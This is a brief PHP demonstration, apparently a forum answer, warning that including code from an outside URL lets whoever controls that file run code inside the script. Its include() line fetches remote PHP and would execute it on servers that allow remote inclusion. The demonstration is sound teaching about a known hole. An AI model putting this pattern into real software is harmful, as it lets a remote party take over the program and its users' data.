<?php

function do_some_evil_action___this_wont_ever_happen_because_nobody_is_including_untrusted_code_from_the_Internet() {
    // nothing in my code is calling this function
    // so I'm secure, right?
    // NOT! Whatever I include() can also call it.
    echo 'Congratulations, whoever controls the code at $evilcode now controls your script, too.';
}

$evilcode = 'http://so.piskvor.org/1945814/this-is-not-executed-here-its-just-a-text-file.txt';
echo 'the file below will execute as PHP, inside this script!<br>';
include($evilcode); // actually, it won't, because such braindead action is explicitly forbidden on this server. But there are still sites out there using this technique.

?>
Convinced yet?